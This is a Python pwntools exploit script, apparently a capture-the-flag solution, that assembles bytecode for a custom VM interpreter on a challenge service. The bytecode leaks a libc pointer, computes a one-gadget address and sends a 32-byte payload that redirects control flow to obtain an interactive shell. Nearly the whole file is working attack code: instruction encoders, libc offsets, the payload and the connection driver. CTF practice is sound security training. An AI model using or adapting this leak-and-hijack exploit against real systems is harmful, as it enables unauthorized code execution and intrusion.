import struct
from base64 import b64encode

from pwn import *
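def _insn(opcode, *operands):
    """Encode one VM instruction: the opcode byte followed by one byte per operand.

    Every operand must be an unsigned byte (0..0xff).  An out-of-range value
    raises ValueError naming the offending operand position, so a mis-assembled
    program fails here with a readable message instead of an opaque packing
    error after the whole program has been built.
    """
    for position, value in enumerate(operands):
        if not 0 <= value <= 0xff:
            raise ValueError(
                "operand %d of opcode %d must be 0..0xff, got %r"
                % (position, opcode, value)
            )
    return struct.pack("<" + "B" * (1 + len(operands)), opcode, *operands)


def write_reg(reg1, reg2, imm):
    """Opcode 1 with operands (reg1, reg2, imm); 4 bytes.

    Operand meaning is inferred from the name only — confirm against the
    interpreter before relying on it.
    """
    return _insn(1, reg1, reg2, imm)


def load_reg(reg1, reg2, imm):
    """Opcode 36 (0x24) with operands (reg1, reg2, imm); 4 bytes."""
    return _insn(36, reg1, reg2, imm)


def overwrite(reg, imm):
    """Opcode 3 with a fixed zero second byte, then (reg, imm); 4 bytes.

    The zero byte is emitted verbatim by the original encoder; whether it is a
    padding byte or a hard-coded register is not visible from this script.
    """
    return _insn(3, 0, reg, imm)


def leak(reg1, reg2, imm):
    """Opcode 4 with operands (reg1, reg2, imm); 4 bytes."""
    return _insn(4, reg1, reg2, imm)


def input_addr(size, reg, imm):
    """Opcode 34 (0x22) with operands (size, reg, imm); 4 bytes.

    The driver pairs this with an io.send() of exactly `size` bytes.
    """
    return _insn(34, size, reg, imm)


def output_addr(size, reg, imm):
    """Opcode 33 (0x21) with operands (size, reg, imm); 4 bytes.

    The driver pairs this with a read of exactly `size` bytes from the service.
    """
    return _insn(33, size, reg, imm)


def imm_to_reg(reg, imm):
    """Opcode 6, a register byte, then a 16-bit little-endian immediate; 4 bytes.

    The immediate is packed as fixed little-endian (the original p16() followed
    pwntools' context.endian, which this script never changes).  Raises
    ValueError if `reg` is not a byte or `imm` does not fit in 16 bits.
    """
    if not 0 <= imm <= 0xffff:
        raise ValueError("imm must be 0..0xffff, got %r" % (imm,))
    return _insn(6, reg) + struct.pack("<H", imm)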
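# ---------------------------------------------------------------------------
# Exploit driver: connect to the challenge service, submit a base64-encoded
# bytecode program that leaks a libc pointer and then accepts a 0x20-byte
# payload, compute a one-gadget address from the leak, and hand over the shell.
# ---------------------------------------------------------------------------

# libc-build-specific constants.  0x7fbbbc6dc083 - 0x7fbbbc6b8000 (== 0x24083)
# is "leaked pointer minus libc load base" as observed in one debugging session
# against one libc build; it is NOT portable.  Re-derive it (and the one-gadget
# offset below) for the target's actual libc before reusing this script.
LIBC_LEAK_OFFSET = 0x7fbbbc6dc083 - 0x7fbbbc6b8000
ONE_GADGET_OFFSET = 0xe3b01
# Each of the six leaked bytes arrives one higher than the real pointer byte,
# hence a 0x01 correction per byte.  Why the VM's output path is off by one
# per byte is not visible from this script — confirm against the binary.
LEAK_BYTE_BIAS = 0x010101010101

io = remote('gold.b01le.rs', 4003)

# Assemble the program as a list of bytes chunks joined once at the end.  The
# original accumulated into a str ('') and padded with '\x00'; that mixes str
# with the bytes the encoders return and is a TypeError on Python 3.  b''
# literals behave identically on Python 2, so this is strictly more portable.
program = []

# Preload the register file so that reg[k] == k + 1 for k in 1..0xfe, then
# point reg[0xff] at 0x800f.  The leak that follows reads through reg 0xff.
for k in range(0xfe):
    program.append(imm_to_reg(k + 1, k + 2))
program.append(imm_to_reg(0xff, 0x800f))
program.append(leak(8, 0xff, 0))

# Seven load_reg steps through reg 0xf with immediates 0..6, followed by a
# 6-byte output — this output is the pointer leak read below.
for k in range(7):
    program.append(load_reg(k + 1, 0xf, k))
program.append(output_addr(6, 0xf, 0))

# Accept 0x20 bytes of attacker data (the payload sent below), then the
# write/overwrite sequence that redirects control.  Exactly what each step
# overwrites is only inferable from the encoder names; confirm against the VM.
program.append(input_addr(0x20, 0xf, 0))
program.append(write_reg(2, 0xf, 0))
program.append(write_reg(3, 0xf, 8))
program.append(overwrite(0xf, 0x10))
program.append(p32(0))  # presumably a terminator (opcode 0) — not visible here

code = b64encode(b''.join(program))
io.sendlineafter(b'>> ', code)

# recvn() blocks until exactly 6 bytes are available; the original recv(6)
# returns *up to* 6 bytes, and a short read would silently corrupt the leak.
# Bound to leaked_ptr rather than `leak` so the leak() encoder is not shadowed.
leaked_ptr = u64(io.recvn(6).ljust(8, b'\x00')) - LEAK_BYTE_BIAS
libc_base = leaked_ptr - LIBC_LEAK_OFFSET
one_gadget = libc_base + ONE_GADGET_OFFSET

# Must be exactly 0x20 bytes to match the input_addr(0x20, ...) instruction.
payload = p64(one_gadget) + p64(0) + p64(0x5d) + p64(0x5e)
assert len(payload) == 0x20, "payload must match the input_addr size"
io.send(payload)

io.interactive()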